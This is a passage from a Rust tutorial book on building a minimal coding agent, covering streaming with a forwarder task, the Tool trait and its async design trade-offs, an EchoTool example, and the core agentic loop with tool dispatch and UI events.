  3. Buffer and split on newlines. TCP chunks can split an SSE line in the middle. The buffer accumulates raw text, and the inner while loop extracts complete lines. This is classic line-oriented protocol parsing — you accumulate bytes and consume lines as they become available. Notice the inner loop keeps going until no more complete lines remain in the buffer, then we wait for the next chunk.
  4. Parse each line. parse_sse_line (from 5a) converts a data: line into StreamEvents. Blank lines (SSE event separators) and non-data lines (comments, keep-alives) return None and are skipped.
  5. Feed both the accumulator and the channel. For every event, the accumulator updates its internal state (building the eventual AssistantTurn) and the channel delivers the same event to the UI in real-time. The let _ = tx.send(event) deliberately discards a send error: if the receiver has been dropped (e.g. the forwarder task has exited because the main loop cancelled), we still want to finish consuming the stream so the underlying HTTP connection can be cleanly released.
  6. Return the assembled message. Once the stream ends (resp.chunk() returns None), the accumulator has collected everything, and finish() produces the final AssistantTurn. At this point tx is dropped (the function is returning), which closes the channel and signals the forwarder task to exit — exactly the termination flow the StreamingAgent section below depends on.

This dual-path design (accumulator + channel) is how Claude Code handles streaming too. The UI renders tokens as they arrive, but the agent loop sees a clean, complete response — no bespoke partial-state handling.

Your task

The OpenRouterProvider lives in src/providers/openrouter.rs. Fill in the constructor, conversion helpers, the Provider impl, and the StreamProvider impl. The required dependencies (reqwest, dotenvy) are already in Cargo.toml.


StreamingAgent

With streaming working at the provider level, we need an agent loop that benefits from it. Streaming an LLM reply into a provider is only useful if the text reaches the user's terminal as it arrives. That wiring is StreamingAgent.

StreamingAgent is the streaming counterpart of SimpleAgent from Chapter 3:

  • SimpleAgent::chat calls provider.chat() and returns a complete AssistantTurn.
  • StreamingAgent::chat calls provider.stream_chat(), forwards text deltas to a UI channel while the LLM is still generating, and then returns the assembled response once the stream finishes.

The struct and builder look identical to SimpleAgent:

#![allow(unused)]
fn main() {
pub struct StreamingAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
}

impl<P: StreamProvider> StreamingAgent<P> {
    pub fn new(provider: P) -> Self {
        Self { provider, tools: ToolSet::new() }
    }

    pub fn tool(mut self, t: impl Tool + 'static) -> Self {
        self.tools.push(t);
        self
    }

    pub async fn run(
        &self,
        prompt: &str,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> {
        let mut messages = vec![Message::User(prompt.to_string())];
        self.chat(&mut messages, events).await
    }

    pub async fn chat(
        &self,
        messages: &mut Vec<Message>,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> { /* ... */ }
}
}

run() is a thin wrapper around chat(). The real work is chat(), and it is this chapter's most subtle piece of code.

The two channels, and the problem they solve

StreamingAgent::chat sits between two channels that speak different vocabularies:

  • Downstream (provider → agent): the provider speaks StreamEvent — raw stream fragments including TextDelta, ToolCallStart, ToolCallDelta, and Done. All the low-level grammar of a streaming LLM response.
  • Upstream (agent → UI): the UI wants AgentEvent — agent-level notifications: TextDelta for displayable text, ToolCall when a tool starts running, Done when the whole conversation finishes, Error if something blows up.

StreamingAgent::chat is the translator. It has to:

  1. Hand the provider a StreamEvent channel so the provider can send deltas into it.
  2. Concurrently pull from that channel, filter TextDeltas, and re-emit them as AgentEvent::TextDelta on the UI channel — all while the provider is still generating.
  3. Wait for the provider to return the assembled AssistantTurn.
  4. Decide: if the turn ended in Stop, emit AgentEvent::Done and return; if it ended in ToolUse, emit a ToolCall event per call, run the tools, append results, and loop.

The critical word is concurrently in step 2. We cannot recv() events after stream_chat returns — by then the generation is over and the UI has been waiting on a frozen screen. We need a separate task pulling from the stream channel while the provider is still writing into it.

The forwarder-task pattern

Here is the full chat() implementation:

#![allow(unused)]
fn main() {
pub async fn chat(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        // 1. Fresh stream channel for this turn.
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();

        // 2. Spawn a forwarder task: drain stream_rx, relay TextDeltas to `events`.
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text));
                }
            }
        });

        // 3. Kick off generation. The provider writes StreamEvents into stream_tx.
        //    Dropping stream_tx here would close the channel early — so we pass it by value.
        let turn = match self.provider.stream_chat(messages, &defs, stream_tx).await {
            Ok(t) => t,
            Err(e) => {
                let _ = events.send(AgentEvent::Error(e.to_string()));
                return Err(e);
            }
        };

        // 4. stream_chat has returned → stream_tx was dropped → forwarder sees
        //    stream_rx closed → forwarder exits. Await it to propagate any panic
        //    and ensure all deltas are flushed before we emit downstream events.
        let _ = forwarder.await;

        // 5. Now handle the assembled turn: stop or another tool round.
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let mut results = Vec::with_capacity(turn.tool_calls.len());
                for call in &turn.tool_calls {
                    let _ = events.send(AgentEvent::ToolCall {
                        name: call.name.clone(),
                        summary: tool_summary(call),
                    });
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t
                            .call(call.arguments.clone())
                            .await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }

                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
                // Loop: feed results back to the LLM.
            }
        }
    }
}
}

Step-by-step:

  1. Fresh channel per loop iteration. A new mpsc::unbounded_channel() every turn. We cannot reuse one across tool rounds — dropping stream_tx is how the forwarder knows the turn is over (see step 4). If we kept the same channel, the forwarder would never exit.

  2. Spawn the forwarder. tokio::spawn runs a task concurrently with the current one. The forwarder loops on stream_rx.recv().await, filtering StreamEvent::TextDelta into AgentEvent::TextDelta. Everything else is dropped — ToolCallStart/ToolCallDelta/Done don't show up in the UI as text. We clone the events sender before moving it into the task because we still need the original to send ToolCall/Done/Error after the forwarder exits.

  3. Call stream_chat and wait. The provider is now writing StreamEvents into stream_tx. The forwarder pulls them off as they arrive and relays text to the UI. Meanwhile the current task is blocked on the stream_chat future. Three tasks are making progress at once: the HTTP response reader, the forwarder, and (via the channel) the UI renderer.

  4. Await the forwarder. When stream_chat returns, its local copy of stream_tx is dropped. That closes the channel, which makes stream_rx.recv() return None, which ends the forwarder's while let loop. Awaiting the JoinHandle does two things: it guarantees the forwarder has flushed every last delta to the UI before we move on, and it surfaces any panic the forwarder might have hit. Forgetting this await is the classic "last few tokens go missing" bug.

  5. Dispatch on stop_reason. At this point we have a complete AssistantTurn and the UI has seen every TextDelta. If the model is done (Stop), we emit AgentEvent::Done and return. If it wants tools (ToolUse), we emit a ToolCall event per invocation (the UI uses these to show "[bash: ls]" spinners), run each tool with the same graceful-error pattern as SimpleAgent, append results to messages, and let the loop spin — which will spawn a fresh forwarder and stream_chat for the next turn.

Why not just rx.recv() in the main loop?

A single-task approach — "call stream_chat, then drain rx" — deadlocks. stream_chat does not return until the stream is fully consumed; with an unbounded channel full of events and nobody reading, the provider keeps writing forever (technically fine, but nothing gets rendered until the end). A bounded channel with that approach would block the provider on tx.send().await, which would block stream_chat, which would never return. Either way the UI sees no tokens until the turn is over — defeating the point of streaming.

The forwarder pattern decouples the two halves: the provider's writer side and the UI's reader side both make progress independently.

The working pattern, end to end

Here is the same flow drawn once, after the deadlock is fixed. Four Rust tasks, three edges that matter: the provider writes tx, the forwarder pulls rx and re-emits onto events, and the main loop awaits on stream_chat's return value for control flow. Termination is purely drop-based: when stream_chat returns, it drops tx; rx.recv() then yields None; the forwarder loop exits; handle.await unblocks.

sequenceDiagram
    participant M as Main loop
    participant F as Forwarder task
    participant P as stream_chat
    participant U as UI (events rx)

    M->>M: let (tx, rx) = mpsc::unbounded_channel::<StreamEvent>()
    M->>F: tokio::spawn(forwarder(rx, events))
    M->>P: provider.stream_chat(messages, tools, tx).await
    Note over P: holds the tx sender;<br/>writes events as they arrive
    P-->>F: tx.send(TextDelta) (many)
    F-->>U: events.send(AgentEvent::TextDelta)
    P-->>F: tx.send(ToolCallStart / Delta / Done)
    F-->>U: events.send(...)
    P-->>M: returns AssistantTurn (drops tx here)
    Note over F: rx.recv() now returns None,<br/>forwarder loop exits naturally
    F-->>M: JoinHandle resolves
    M->>M: match turn.stop_reason { Stop => ..., ToolUse => ... }

Three invariants keep this alive:

  1. The provider owns the sender. Only stream_chat holds a tx — the main loop hands it over and does not keep a clone. When stream_chat returns, the last tx is dropped, which closes the channel.
  2. The forwarder owns the receiver. It runs in its own spawned task so the receiver can make progress while stream_chat is still writing. No one else calls rx.recv().
  3. The main loop awaits both. First stream_chat, then the forwarder's JoinHandle. Awaiting the handle is what prevents the main loop from leaking a half-finished forwarder into the next iteration of the agent loop.

If any one of these three breaks — a stray tx clone held by the main loop, the forwarder running inline on the main task, or the main loop skipping the handle await — you get a subtle variant of the deadlock above. This is why the pattern is worth learning once and reaching for any time you need streaming I/O bridged into a step-wise decision loop.

Your task

Fill in the StreamingAgent::chat() stub in src/streaming.rs. Use the four-step recipe: channel, forwarder, await stream_chat, await forwarder. Then the match on stop_reason is the same shape as SimpleAgent::chat.


Run the tests

cargo test -p mini-claw-code-starter test_openrouter_
cargo test -p mini-claw-code-starter test_streaming_streaming_agent_
cargo test -p mini-claw-code-starter test_streaming_stream_chat_

What these tests verify

test_openrouter_ (OpenRouterProvider):

  • test_openrouter_convert_messages — internal Message variants are converted to the correct OpenAI API format
  • test_openrouter_convert_toolsToolDefinition values are wrapped in the OpenAI function-calling envelope

test_streaming_streaming_agent_ (StreamingAgent end-to-end against MockStreamProvider):

  • test_streaming_streaming_agent_text_response — single-turn text response; UI channel sees at least one TextDelta and a Done
  • test_streaming_streaming_agent_tool_loop — the agent runs a tool round and produces a final answer; UI channel sees a ToolCall event and a Done
  • test_streaming_streaming_agent_chat_historychat() appends the final assistant turn to the caller-provided messages vec

test_streaming_stream_chat_ (OpenRouter streaming against a local TCP mock):

  • test_streaming_stream_chat_events_order — a scripted SSE body is parsed into events in the correct order and the assembled AssistantTurn matches

Key takeaway

StreamingAgent is where everything from 5a pays off. The provider produces StreamEvents, the forwarder task translates them into UI-level AgentEvents as they arrive, and the main loop waits on the assembled AssistantTurn to decide what to do next. Tokens hit the terminal in real time; the agent loop still sees a clean, complete message — no special-casing for streaming vs non-streaming.

The pattern — "split a complex stream into two concurrent sides, bridged by a task" — is the same one Claude Code uses in its renderer. Once you've written it once, it shows up everywhere you need to mix streaming I/O with step-wise decision-making.

In Chapter 6 we turn from providers to tools — the other half of the agent's interface with the outside world.

Check yourself


← Chapter 5a: Provider & Streaming Foundations · Contents · Chapter 6: Tool Interface →

Chapter 6: Tool Interface

File(s) to edit: none — this chapter is a conceptual walkthrough of the Tool trait. The hands-on EchoTool below is meant to be built from scratch in a scratch file (or tried in the Rust playground); the starter does not ship an echo.rs stub and the existing test_read_* tests from Chapter 2 are unaffected by anything you do here. Reading time: 25 min

Goal

  • Understand why the Tool trait uses #[async_trait] (object safety for heterogeneous storage) while Provider uses RPITIT (zero-cost generics).
  • Implement a concrete EchoTool that demonstrates the full tool lifecycle: schema definition, trait implementation, registration, and execution.
  • Verify that ToolSet correctly registers tools and returns their definitions for the LLM.

In the last chapter we gave our agent a voice by connecting it to an LLM provider. But a model that can only produce text is like a programmer who can only talk about code without ever touching a keyboard. In this chapter we give the agent hands.

You already defined the tool types in Chapter 4 -- ToolDefinition, Tool trait, and ToolSet. In this chapter we will understand why those types are designed the way they are, explore the critical distinction between #[async_trait] and RPITIT, and then wire everything together by implementing your first concrete tool: an EchoTool.

Tool lifecycle

flowchart LR
    A[Tool::new] -->|stores| B[ToolDefinition]
    B -->|registered in| C[ToolSet]
    C -->|definitions sent to| D[LLM]
    D -->|responds with| E[ToolCall]
    E -->|dispatched via| C
    C -->|lookup by name| F[Tool::call]
    F -->|returns| G[String result]
    G -->|wrapped as| H[Message::ToolResult]

Design context: how Claude Code models tools

Claude Code's TypeScript codebase defines tools with a generic Tool<Input, Output, Progress> type. Each tool carries a Zod schema for input validation, returns rich structured output (sometimes including React elements for terminal rendering), and can emit progress events during long-running operations. There are over 40 tools in production, each with permission metadata, cost hints, and UI integration.

We are going to keep the shape but cut the ceremony. In our Rust version:

Claude Code (TypeScript)mini-claw-code-starter (Rust)
Tool<Input, Output, Progress>trait Tool (no generics)
Zod schema for inputserde_json::Value + builder
Rich ToolResult<T>anyhow::Result<String>
React-rendered progress(not implemented)
40+ tools with Zod validation5 tools with JSON schema
isReadOnly, isDestructive, etc.(not implemented -- kept minimal)

The key simplification: we drop the generic parameters and the safety/display methods. Claude Code needs <Input, Output, Progress> because each tool has a distinct strongly-typed input shape and renders different UI. We use serde_json::Value for input and String for output, which lets us store heterogeneous tools in a single collection without type erasure gymnastics.

Why two async trait styles? (#[async_trait] vs RPITIT)

This is the most important design decision in the type system, and it is worth understanding deeply. The same trade-off drives every async trait in this book -- Provider, Tool, StreamProvider, Hook, SafetyCheck. Read this section once; other chapters link back to it.

Look at the Provider trait from Chapter 4:

#![allow(unused)]
fn main() {
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
}

This uses RPITIT (return-position impl Trait in traits), a feature stabilized in Rust 1.75. The compiler generates a unique future type for each implementation. It is zero-cost and avoids boxing.

But RPITIT has a catch: it makes the trait non-object-safe. You cannot write Box<dyn Provider> because the compiler needs to know the concrete future type at compile time. That is fine for providers -- we use them as generic parameters (struct SimpleAgent<P: Provider>), so the concrete type is always known.

Tools are different. We need to store a heterogeneous collection of tools -- BashTool, ReadTool, WriteTool, all in one HashMap. That requires Box<dyn Tool>, which requires object safety. And object safety requires that async methods return a known type, not an opaque impl Future.

The #[async_trait] macro from the async-trait crate solves this by rewriting async fn call(...) into a method that returns Pin<Box<dyn Future<...> + Send + '_>>. The boxing has a small cost (one heap allocation per tool call), but tool calls involve I/O that dwarfs the allocation.

Provider: generic param P       -> RPITIT (zero-cost, not object-safe)
Tool:     stored in Box<dyn>    -> #[async_trait] (boxed future, object-safe)

This split is a deliberate design choice. If Rust stabilizes dyn async fn in the future, we could drop async_trait entirely. Until then, the two-strategy approach gives us the best of both worlds.

Note that in the MockProvider impl from Chapter 5a, we wrote async fn chat(...) directly. That works because Rust 1.75+ allows async fn in trait impls even when the trait signature uses the RPITIT form. The compiler desugars it correctly. You can do the same for Tool impls -- write async fn call(...) and the #[async_trait] macro handles the rest.

Decision rule: which pattern for your next trait?

The question to ask about any new async trait is "do I need to store values of this trait with different concrete types in the same collection?" That single question decides it:

                  Do you need Box<dyn MyTrait> anywhere?
                                 │
                 ┌──────────────┴───────────────┐
                 ▼                              ▼
               yes                              no
                 │                              │
                 ▼                              ▼
   #[async_trait::async_trait]          trait MyTrait {
   trait MyTrait: Send + Sync {            fn do_it(&self)
       async fn do_it(&self)                 -> impl Future<...> + Send;
         -> Result<...>;                  }
   }                                      // callers use `impl MyTrait` or
   // callers use Box<dyn MyTrait>        // generic `<T: MyTrait>` params

Concrete cues that push you toward #[async_trait]:

  • You want a Vec<Box<dyn MyTrait>>, HashMap<K, Box<dyn MyTrait>>, or similar runtime-heterogeneous container. (This is what ToolSet does.)
  • You want to return Box<dyn MyTrait> from a function because callers do not need to know the concrete type.
  • You want users to plug in new implementations at runtime (e.g. via a dynamic registry or plugin system).

Concrete cues that push you toward RPITIT:

  • Every caller knows the concrete implementation at compile time. A struct like SimpleAgent<P: Provider> monomorphises once per provider.
  • Throughput matters enough that you care about avoiding one boxed-future allocation per call.
  • The trait has lots of async methods and you do not want async_trait to insert a Box around each one.

For this book, every trait we define happens to fall cleanly on one side: Provider / StreamProvider / SafetyCheck are monomorphised through generic parameters (RPITIT); Tool / HookHandler / InputHandler get stored as Box<dyn _> in a heterogeneous collection (#[async_trait]). When you add a new trait in your own extensions, walk the question above and you will not have to think about it again.

Why tool errors never terminate the agent

A tool failure is not an agent failure. If the LLM asks to read a file that does not exist, the right behaviour is to tell it "error: file not found" and let it recover -- try a different path, ask the user, or move on. A genuine Err(...) escaping to the top of the agent loop would instead terminate the conversation, which is almost never what we want.

We get that behaviour by agreement between the Tool impl and the agent loop:

  1. Tools return anyhow::Result<String>. On failure they use bail!("reason") or ?-propagation (context.read_to_string(...).with_context(|| ...)?). You will see bail! used heavily in the file tools in Chapter 9.
  2. The agent loop catches tool errors with .unwrap_or_else(|e| format!("error: {e}")) before packaging the result into a Message::ToolResult. The LLM always receives a string -- either the tool's success output or the formatted error.

So from inside a tool you write idiomatic Rust (?, bail!, anyhow::Context); from the LLM's side every outcome looks like a string. The only failures that do escape the agent loop are genuinely unrecoverable ones -- network failure talking to the provider, a serialization bug, a panic -- none of which a tool implementation should produce on its own.

You will see one small variation in Chapter 14: SafeToolWrapper catches its safety-check errors and returns Ok("error: safety check failed: ...") directly, rather than letting them propagate. This is equivalent (the agent loop would have formatted the Err the same way), but keeps the wrapper's error-handling self-contained when it is acting as a pre-filter.

Hands-on: building an EchoTool

Time to implement your first concrete tool. We will build a minimal EchoTool that takes a text argument and returns it unchanged. This covers the full lifecycle: defining a schema, implementing the trait, and registering with a ToolSet.

Step 1: the struct and definition

#![allow(unused)]
fn main() {
struct EchoTool {
    def: ToolDefinition,
}

impl EchoTool {
    fn new() -> Self {
        Self {
            def: ToolDefinition::new("echo", "Echo the input")
                .param("text", "string", "Text to echo", true),
        }
    }
}
}

The ToolDefinition is built once in the constructor and stored as a field. The schema tells the LLM: "this tool is called echo, it takes a required string parameter called text."

Step 2: implement the Tool trait

#![allow(unused)]
fn main() {
#[async_trait::async_trait]
impl Tool for EchoTool {
    fn definition(&self) -> &ToolDefinition {
        &self.def
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let text = args["text"].as_str().unwrap_or("(no text)");
        Ok(text.to_string())
    }
}
}

A few things to note:

  • definition() returns a reference to the stored ToolDefinition.
  • call() indexes into the JSON args to extract text. If the key is missing or not a string, we fall back to "(no text)" rather than panicking. Always be defensive with LLM-provided arguments.
  • call() returns anyhow::Result<String> -- just a plain string, not a ToolResult struct. The starter keeps tool output simple.
  • There are only two required methods. No safety flags, no validation, no summary -- the starter's Tool trait is minimal.

Step 3: register and use

#![allow(unused)]
fn main() {
let tools = ToolSet::new().with(EchoTool::new());

// The agent loop would do this:
let defs = tools.definitions();
// ... send defs to LLM, get back a ToolCall ...

let tool = tools.get("echo").unwrap();
let result = tool.call(serde_json::json!({"text": "hello"})).await?;
assert_eq!(result, "hello");
}

That is the full round-trip. Definition goes to the LLM, the LLM produces a ToolCall, we look up the tool by name, call it, and feed the result back.

The minimal trait

The starter's Tool trait has exactly two required methods:

MethodPurpose
definition()Return the tool's JSON Schema description
call()Execute the tool and return a string result

There are no default methods, no safety flags, no validation hooks. This is intentional -- the starter keeps things simple so you can focus on the agent loop mechanics. Claude Code's real tool system adds is_read_only(), is_destructive(), validate_input(), and more, but those are not needed to build a working agent.

How this compares to Claude Code

Claude Code's tool system is substantially larger:

  • 40+ tools spanning file operations, git, search, browser, notebook, MCP, and more. We build 5.
  • Zod schemas provide runtime validation with TypeScript type inference. We use serde_json::Value with a builder.
  • React rendering -- tools can return React elements that render rich terminal UI (diffs, tables, progress bars). We return plain strings.
  • Progress events -- tools emit typed progress events during execution. We have activity_description() for a simple spinner.
  • Tool groups and permissions -- tools are organized into permission groups with allow/deny lists. We will build our permission system in Chapter 13, but it will be simpler.
  • Cost hints -- tools can declare estimated token costs to help the context manager. Our TokenUsage type from Chapter 4 tracks tokens at the message level, but we do not carry cost hints on individual tools.

Despite these differences, the core protocol is identical. An LLM sees a list of tool schemas, decides to call one, the agent executes it, and the result goes back to the LLM. Everything else -- validation, permissions, progress, rendering -- is orchestration around that loop. Understanding the Tool trait gives you the foundation to understand Claude Code's full system.

Implementation note

There is no new source file to create in this chapter. The EchoTool exists only in the test file (src/tests/ch3.rs). Your job is to verify that the types you built in Chapter 4 -- Tool, ToolDefinition, ToolSet -- work correctly with a concrete tool implementation. If the test_read_ tests pass, your type definitions are correct.

Run the tests

cargo test -p mini-claw-code-starter test_read_

What the tests verify

  • test_read_read_definition -- the ReadTool produces the correct name and a non-empty description from its ToolDefinition, and the "path" parameter is required
  • test_read_read_file -- calling with a valid path returns the file's content, verifying argument extraction and return value
  • test_read_read_missing_file -- calling with a nonexistent path returns an error
  • test_read_read_missing_arg -- calling with no arguments returns an error

Key takeaway

The Tool trait is deliberately minimal -- just definition() and call(). This simplicity means every tool, from a trivial echo to a complex bash executor, implements the same two-method interface. The agent loop does not need to know what a tool does; it only needs to look it up by name and call it.

Summary

This chapter focused on the why behind the tool types you defined in Chapter 4:

  • #[async_trait] vs RPITIT -- the critical distinction. Tools need object safety for heterogeneous storage; providers need zero-cost generics. The two-strategy approach gives you both.
  • Errors are values -- tool failures return Ok("error: ..."), not Err(...). The agent loop continues. The model adapts.
  • EchoTool -- your first concrete tool, demonstrating the full lifecycle: schema definition, trait implementation, registration, execution.

In the next chapter we build the SimpleAgent -- the loop that ties providers and tools together into a functioning agent.

Check yourself


← Chapter 5b: OpenRouter & StreamingAgent · Contents · Chapter 7: The Agentic Loop (Deep Dive) →

Chapter 7: The Agentic Loop (Deep Dive)

File(s) to edit: src/agent.rs — only the run_with_history stub is new in this chapter. single_turn, execute_tools, and chat were implemented back in Chapter 3; this chapter is a deep-dive walkthrough of the loop you already built, plus a thin new event-emitting variant. Tests to run: the same Chapter 3 tests still apply (cargo test -p mini-claw-code-starter test_single_turn_, cargo test -p mini-claw-code-starter test_simple_agent_); there is no dedicated test in the starter for run_with_history — verify it manually by running the example in Chapter 5b and watching the event stream. Estimated time: 45 min

Goal

  • Revisit SimpleAgent::chat from Chapter 3 with a careful walk-through of the control flow, the message ordering, and the edge cases. You are not reimplementing it -- you are understanding what you already wrote.
  • Revisit execute_tools and make sure you know why tool errors become result strings rather than propagating -- the rationale links back to the agreement explained in Chapter 6.
  • Implement the one new piece: run_with_history, an event-emitting variant of the main loop that sends an AgentEvent after every turn so a UI layer (built in later chapters) can observe progress.
  • Understand message ordering: why Message::Assistant must be pushed before the matching Message::ToolResult values.

This is the chapter where everything clicks.

In the previous chapters you built the vocabulary (messages), the mouth (provider), and the hands (tools). Now you build the brain -- the loop that ties them all together. The SimpleAgent is the heart of a coding agent. It is the thing that takes a user prompt, talks to an LLM, executes tools, feeds results back, and keeps going until the job is done.

Every coding agent -- Claude Code, Cursor, Aider, OpenCode -- has some version of this loop. The details vary (streaming, permissions, compaction), but the skeleton is identical. Get this right and you have a working agent. Everything else in this book is refinement.

What the SimpleAgent does

Here is the entire agent lifecycle in one sentence: prompt the LLM, check if it wants to use tools, execute those tools, send the results back, repeat until the LLM says it is done.

That is it. The SimpleAgent implements this loop. It owns three things:

  1. A provider -- the LLM backend (from Chapter 5a / 5b)
  2. A tool set -- the registered tools (from Chapter 6)
  3. A config -- safety limits and behavior knobs
flowchart TD
    A[User prompt] --> B[SimpleAgent::chat]
    B --> C[Provider.chat]
    C --> D{StopReason?}
    D -->|Stop| E[Return final text]
    D -->|ToolUse| F[execute_tools]
    F --> G[Push Message::Assistant]
    G --> H[Push Message::ToolResult for each result]
    H --> C

If you have read Claude Code's source, this maps to the query engine and the query function. Our version strips away streaming, permissions, hooks, and compaction -- those come in later chapters -- leaving the pure control flow.

The SimpleAgent struct

The starter's SimpleAgent is leaner than a production engine -- no config struct, no max turns, no truncation. Just a provider and tools:

#![allow(unused)]
fn main() {
pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}
}

Generic over P: Provider, so the same agent works with OpenRouterProvider in production and MockProvider in tests. The builder pattern lets you configure it fluently:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(BashTool::new())
    .tool(ReadTool::new())
    .tool(WriteTool::new());
}

No surprises. The interesting part is the methods that actually run.

execute_tools: the tool dispatch helper

Before tackling the main loop, we need a helper that takes a slice of ToolCalls from the LLM and produces results. This is execute_tools:

#![allow(unused)]
fn main() {
async fn execute_tools(&self, calls: &[ToolCall]) -> Vec<(String, String)> {
    let mut results = Vec::with_capacity(calls.len());
    for call in calls {
        let result = match self.tools.get(&call.name) {
            Some(t) => {
                t.call(call.arguments.clone())
                    .await
                    .unwrap_or_else(|e| format!("error: {e}"))
            }
            None => format!("error: unknown tool `{}`", call.name),
        };
        results.push((call.id.clone(), result));
    }
    results
}
}

Two stages:

  1. Tool lookup -- If the LLM hallucinates a tool name that does not exist, we return an error string. The model sees "error: unknown tool \foo`"` and can recover. This happens more than you might expect, especially with smaller models.

  2. Execute -- Run the tool. If it fails, .unwrap_or_else(|e| format!("error: {e}")) converts the error to a string the model can read.

Note the return type: Vec<(String, String)> -- pairs of (call ID, result string). No ToolResult struct, no truncation, no validation. The starter keeps this simple.

This is a key design decision: tool errors become results, not panics. The agent loop never crashes because a tool failed. The model reads the error, adjusts its approach, and tries again.

The chat() method: the core loop

This is it. The agentic loop. Read it carefully -- it is shorter than you expect.

#![allow(unused)]
fn main() {
pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        let turn = self.provider.chat(messages, &defs).await?;

        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
}

Let's break it down.

Tool definitions: collected once

#![allow(unused)]
fn main() {
let defs = self.tools.definitions();
}

We gather tool definitions outside the loop. They do not change between iterations -- the tool set is fixed for the lifetime of the agent. Every call to provider.chat() includes these definitions so the LLM knows which tools are available.

Call the provider

#![allow(unused)]
fn main() {
let turn = self.provider.chat(messages, &defs).await?;
}

Send the full message history and tool definitions to the LLM. The ? propagates provider errors (network failure, auth error, rate limit) directly to the caller. Provider errors are not recoverable by the agent loop -- they need human intervention.

Match the stop reason

#![allow(unused)]
fn main() {
match turn.stop_reason {
    StopReason::Stop => { /* final answer */ }
    StopReason::ToolUse => { /* tool dispatch */ }
}
}

The LLM tells us why it stopped generating. Two possibilities:

  • Stop -- The model is done. It has a final text answer. Extract it, push the assistant message into history, return.
  • ToolUse -- The model wants to use tools. It has populated tool_calls with one or more calls. Execute them, push results, loop.

The two branches

StopReason::Stop -- Clone the text, push the assistant message into history, return. The conversation ends with an Assistant message, ready for the next user turn.

StopReason::ToolUse -- Execute the tools, then push messages in this exact order:

  1. First, Message::Assistant(turn) -- the assistant's response including its tool calls
  2. Then, Message::ToolResult { id, content } for each tool result

This ordering matters. The LLM API expects tool results to follow the assistant message that requested them. Each ToolResult is linked to its ToolCall by the id field. If you push them in the wrong order, the provider will reject the request.

After pushing results, the loop continues. The next iteration sends the entire history -- including the tool calls and their results -- back to the LLM. The model sees what happened and decides what to do next.

Rust concept: ownership and &mut Vec<Message>

The caller owns the message history and passes it as &mut Vec<Message>. This is a deliberate Rust ownership decision -- the agent borrows the history mutably for the duration of the call, but ownership stays with the caller. The alternative would be for the agent to own the Vec, but then the caller could not inspect the history after the call, and multi-turn conversations would require moving the Vec in and out of the agent. &mut is the cleanest solution: the agent pushes messages into the caller's vec, and the caller retains full control afterward.

The caller owns the message history and passes it as &mut Vec<Message>. This is deliberate:

  1. Multi-turn conversations -- The caller can push a new Message::User(...) and call chat() again. The agent picks up where it left off with the full context.
  2. Inspection -- After chat() returns, the caller can examine the full message history to see every tool call, every result, every intermediate step.
  3. Persistence -- The caller can serialize the messages to disk for session save/resume.

run(): the convenience wrapper

Most of the time you just want to send a prompt and get a response. That is run():

#![allow(unused)]
fn main() {
pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}
}

Two lines. Creates a fresh message history with the user prompt, delegates to chat(). The message history is discarded after the call -- use chat() directly if you need to preserve it.

AgentEvent: making it observable

The chat() method returns when the agent is done. That is fine for tests, but a real UI needs to show progress while the loop is running. What tool is being called? How long has it been running? Is it done?

The AgentEvent enum models these updates:

#![allow(unused)]
fn main() {
#[derive(Debug)]
pub enum AgentEvent {
    /// A chunk of text streamed from the LLM (streaming mode only).
    TextDelta(String),
    /// A tool is being called.
    ToolCall { name: String, summary: String },
    /// The agent finished with a final response.
    Done(String),
    /// The agent encountered an error.
    Error(String),
}
}

Four variants covering the lifecycle:

EventWhenUI use
TextDeltaLLM streams a text chunkAppend to terminal output
ToolCallA tool is being calledShow: " [bash: ls -la]"
DoneAgent loop finishedDisplay final answer
ErrorUnrecoverable errorShow error message

Note: the starter combines ToolStart/ToolEnd into a single ToolCall event. The summary field is generated by the tool_summary() helper in src/agent.rs, which looks for common argument keys (command, path, question) and formats them like [bash: ls -la].

run_with_events / run_with_history

These methods duplicate the core loop logic but emit events through a tokio::sync::mpsc::UnboundedSender<AgentEvent> channel. The caller creates the channel, passes the sender, and consumes events from the receiver -- typically in a separate task that drives the UI.

#![allow(unused)]
fn main() {
pub async fn run_with_events(
    &self,
    prompt: &str,
    events: mpsc::UnboundedSender<AgentEvent>,
) {
    let messages = vec![Message::User(prompt.to_string())];
    self.run_with_history(messages, events).await;
}
}

run_with_history has the same structure as chat() but with events woven in. It takes ownership of the messages vec and returns the full history. Errors are sent as AgentEvent::Error rather than propagated.

The key differences from chat():

  1. Provider errors are caught with match instead of ?, and sent as AgentEvent::Error.
